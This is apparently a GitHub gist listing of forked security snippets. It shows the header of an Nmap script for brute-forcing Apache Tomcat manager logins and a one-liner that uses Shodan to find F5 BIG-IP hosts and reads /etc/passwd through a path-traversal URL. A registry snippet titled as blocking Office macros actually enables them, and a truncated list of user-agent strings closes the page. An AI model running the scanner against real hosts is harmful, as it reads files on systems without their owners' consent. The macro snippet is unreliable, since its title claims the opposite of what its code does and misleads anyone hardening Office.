rosonsec
rosonsec
/ http-tomcat-manager.nse
Created
November 7, 2019 16:52
— forked from initbrain/http-tomcat-manager.nse
Nmap NSE script that performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local shortport = require "shortport" | |
| local http = require "http" | |
| local stdnse = require "stdnse" | |
| local brute = require "brute" | |
| local creds = require "creds" | |
| description = [[ | |
| Performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages. | |
| ]] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done | |
| #sudo apt install curl | |
| #sudo apt install python3-shodan | |
| #shodan init YOUR_API_KEY |
rosonsec
/ block-macro-ms-office.txt
Created
June 14, 2021 11:37
— forked from Mbosinwa/block-macro-ms-office.txt
Block macros in Microsoft Office suite using registry
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The default registry key for macro security is | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security] | |
| "VBAWarnings"=dword:00000001 | |
| You could set it with a script: | |
| Set wso = CreateObject("WScript.Shell") | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| and it would enable macros. This only works if Word is either closed when you run the script or restarted afterwards. |
rosonsec
/ gist:668078234f1fa2f05204792d8fac8aad
Created
November 27, 2023 12:20
— forked from CryptoCloud9/gist:9eec69c26e2999773c6f55cff8a4631d
Newest User Agents 2023
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 | |
| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12 | |
| Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 | |
| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 8_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12D508 Safari/600.1.4 | |
| Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 | |
| Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 | |
| Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | |
| Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240 |